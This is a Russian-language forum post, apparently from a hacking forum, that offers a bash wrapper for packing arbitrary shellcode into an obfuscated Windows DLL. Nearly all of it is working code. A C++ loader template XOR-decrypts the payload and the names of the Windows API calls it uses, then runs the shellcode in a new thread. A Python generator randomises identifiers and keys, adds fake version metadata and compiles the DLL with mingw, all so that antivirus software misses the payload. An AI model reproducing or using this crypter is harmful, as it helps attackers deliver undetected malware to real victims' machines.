Решил не отставать от моды и на коленке зае@шил враппер на тему ;-) Без лишних слов, к делу)
chmod +x convert (так назовем, предположим) ; mv convert /usr/local/bin ; convert /path/to/any.bin
Всем хорошего настроения ;-)
Bash:
#!/bin/bash
cp "$1" /tmp/shellcode.bin ; rndname="$(curl -s https://gitlab.com/x4k/pub/-/raw/master/names.txt | shuf -n1)"
cat<<'EOF'>/tmp/source.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment (lib, "user32.lib")
unsigned char calc_payload[] = { };
unsigned char virtual_alloc[] = { };
unsigned char virtual_protect[] = { };
unsigned char createthread[] = { };
unsigned char waitforsingleobject[] = { };
unsigned int calc_len = sizeof(calc_payload);
unsigned int va_len = sizeof(virtual_alloc);
unsigned int vp_len = sizeof(virtual_protect);
unsigned int ct_len = sizeof(createthread);
unsigned int wfso_len = sizeof(waitforsingleobject);
char pl_key[] = "";
char va_key[] = "";
char vp_key[] = "";
char ct_key[] = "";
char wfso_key[] = "";
LPVOID (WINAPI * pVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
BOOL (WINAPI * pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
HANDLE (WINAPI * pCreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
DWORD (WINAPI * pWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
int j;
j = 0;
for (int i = 0; i < data_len; i++) {
if (j == key_len - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
extern "C" {
__declspec(dllexport) BOOL WINAPI RunME(void) {
void * exec_mem;
BOOL rvba;
HANDLE thba;
DWORD oldprotect = 0;
XOR((char *) virtual_alloc, va_len, va_key, sizeof(va_key));
pVirtualAlloc = GetProcAddress(GetModuleHandle("kernel32.dll"), virtual_alloc);
exec_mem = pVirtualAlloc(0, calc_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
XOR((char *) calc_payload, calc_len, pl_key, sizeof(pl_key));
RtlMoveMemory(exec_mem, calc_payload, calc_len);
XOR((char *) virtual_protect, vp_len, vp_key, sizeof(vp_key));
pVirtualProtect = GetProcAddress(GetModuleHandle("kernel32.dll"), virtual_protect);
rvba = pVirtualProtect(exec_mem, calc_len, PAGE_EXECUTE_READ, &oldprotect);
if ( rvba != 0 ) {
XOR((char *) createthread, ct_len, ct_key, sizeof(ct_key));
pCreateThread = GetProcAddress(GetModuleHandle("kernel32.dll"), createthread);
thba = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
XOR((char *) waitforsingleobject, wfso_len, wfso_key, sizeof(wfso_key));
pWaitForSingleObject = GetProcAddress(GetModuleHandle("kernel32.dll"), waitforsingleobject);
pWaitForSingleObject(thba, -1);
}
return TRUE;
}
}
EOF
cat<<'EOF'>/tmp/resource.rc
#define VER_FILEVERSION 31,3,3,7
#define VER_FILEVERSION_STR "31,3,3,7\0"
#define VER_PRODUCTVERSION 3,10,0,0
#define VER_PRODUCTVERSION_STR "3.10\0"
#ifndef DEBUG
#define VER_DEBUG 0
#else
#define VER_DEBUG VS_FF_DEBUG
#endif
VS_VERSION_INFO VERSIONINFO
FILEVERSION VER_FILEVERSION
PRODUCTVERSION VER_PRODUCTVERSION
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "040904E4"
BEGIN
VALUE "CompanyName", "Horns and Hooves Inc."
VALUE "FileDescription", "Win32 Test DLL"
VALUE "FileVersion", "31.3.3.7"
VALUE "InternalName", "RNDNAME"
VALUE "LegalCopyright", "CopyRight ©2021 Horns and Hooves Inc."
VALUE "OriginalFilename", "RNDNAME.dll"
VALUE "ProductName", "Win32 Test DLL"
VALUE "ProductVersion", "31.3.3.7"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x809, 1200
END
END
EOF
cat<<'EOF'>/tmp/conv.py
#!/bin/python3
import sys
import random
import string
import os
import time
def get_random_string():
length = random.randint(8, 15)
result_str = ''.join(random.choice(string.ascii_letters) for i in range(length))
return result_str
def xor(data):
key = get_random_string()
l = len(key)
output_str = ""
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
o = lambda x: x if isinstance(x, int) else ord(x)
output_str += chr(o(current) ^ ord(current_key))
ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output_str) + ' };'
return ciphertext, key
def converter():
try:
plaintext = open("/tmp/shellcode.bin", "rb").read()
except:
sys.exit(1)
f1 = "VirtualAlloc"
f2 = "VirtualProtect"
f3 = "CreateThread"
f4 = "WaitForSingleObject"
e1 = get_random_string()
calc_name = get_random_string()
va_name = get_random_string()
vp_name = get_random_string()
ct_name = get_random_string()
wfso_name = get_random_string()
pl_key_name = get_random_string()
va_key_name = get_random_string()
vp_key_name = get_random_string()
ct_key_name = get_random_string()
wfso_key_name = get_random_string()
pl_key_size = get_random_string()
va_key_size = get_random_string()
vp_key_size = get_random_string()
ct_key_size = get_random_string()
wfso_key_size = get_random_string()
pva = get_random_string()
pvp = get_random_string()
pct = get_random_string()
pwfso = get_random_string()
p_execmem = get_random_string()
p_rvba = get_random_string()
p_thba = get_random_string()
p_oldprotect = get_random_string()
xor_name = get_random_string()
ciphertext, pl_key = xor(plaintext)
ciphertext1, va_key = xor(f1)
ciphertext2, vp_key = xor(f2)
ciphertext3, ct_key = xor(f3)
ciphertext4, wfso_key = xor(f4)
template = open("/tmp/source.cpp", "rt")
data = template.read()
data = data.replace('RunME', e1)
data = data.replace('unsigned char calc_payload[] = { };', 'unsigned char calc_payload[] = ' + ciphertext)
data = data.replace('unsigned char virtual_alloc[] = { };', 'unsigned char virtual_alloc[] = ' + ciphertext1)
data = data.replace('unsigned char virtual_protect[] = { };', 'unsigned char virtual_protect[] = ' + ciphertext2)
data = data.replace('unsigned char createthread[] = { };', 'unsigned char createthread[] = ' + ciphertext3)
data = data.replace('unsigned char waitforsingleobject[] = { };', 'unsigned char waitforsingleobject[] = ' + ciphertext4)
data = data.replace('char pl_key[] = "";', 'char pl_key[] = "' + pl_key + '";')
data = data.replace('char va_key[] = "";', 'char va_key[] = "' + va_key + '";')
data = data.replace('char vp_key[] = "";', 'char vp_key[] = "' + vp_key + '";')
data = data.replace('char ct_key[] = "";', 'char ct_key[] = "' + ct_key + '";')
data = data.replace('char wfso_key[] = "";', 'char wfso_key[] = "' + wfso_key + '";')
data = data.replace('calc_payload', calc_name)
data = data.replace('virtual_alloc', va_name)
data = data.replace('virtual_protect', vp_name)
data = data.replace('createthread', ct_name)
data = data.replace('waitforsingleobject', wfso_name)
data = data.replace('pl_key', pl_key_name)
data = data.replace('va_key', va_key_name)
data = data.replace('vp_key', vp_key_name)
data = data.replace('ct_key', ct_key_name)
data = data.replace('wfso_key', wfso_key_name)
data = data.replace('calc_len', pl_key_size)
data = data.replace('va_len', va_key_size)
data = data.replace('vp_len', vp_key_size)
data = data.replace('ct_len', ct_key_size)
data = data.replace('wfso_len', wfso_key_size)
data = data.replace('pVirtualAlloc', pva)
data = data.replace('pVirtualProtect', pvp)
data = data.replace('pCreateThread', pct)
data = data.replace('pWaitForSingleObject', pwfso)
data = data.replace('exec_mem', p_execmem)
data = data.replace('rvba', p_rvba)
data = data.replace('thba', p_thba)
data = data.replace('oldprotect', p_oldprotect)
data = data.replace('XOR', xor_name)
template.close()
template = open("/tmp/out.cpp", "w+")
template.write(data)
template.close
return e1
def main():
try:
e1 = converter()
except:
sys.exit(1)
print("[!!!] Ошибка :(")
try:
os.system("x86_64-w64-mingw32-windres -i /tmp/resource.rc -o /tmp/resource.o")
os.system("x86_64-w64-mingw32-g++ -O3 -shared -o /tmp/RNDNAME.dll /tmp/out.cpp /tmp/resource.o -fpermissive >/dev/null 2>&1")
print("Готово! ep: " + e1)
except:
print("[!!!] Ошибочка :(")
os.system("rm /tmp/out.cpp /tmp/source.cpp /tmp/resource.o /tmp/resource.rc /tmp/shellcode.bin")
if __name__ == "__main__":
main()
EOF
sed -i "s+RNDNAME+$rndname+g" /tmp/conv.py ; sed -i "s+RNDNAME+$rndname+g" /tmp/resource.rc ; python3 /tmp/conv.py ; rm /tmp/conv.py
printf "\033[1;37mФайлы тут => " ; if [ -n "$(type ls++)" ] ; then ls++ /tmp/"$rndname".dll ; else ls --color=always -al /tmp/"$rndname".dll ; fichmod +x convert (так назовем, предположим) ; mv convert /usr/local/bin ; convert /path/to/any.bin
Всем хорошего настроения ;-)
Последнее редактирование:
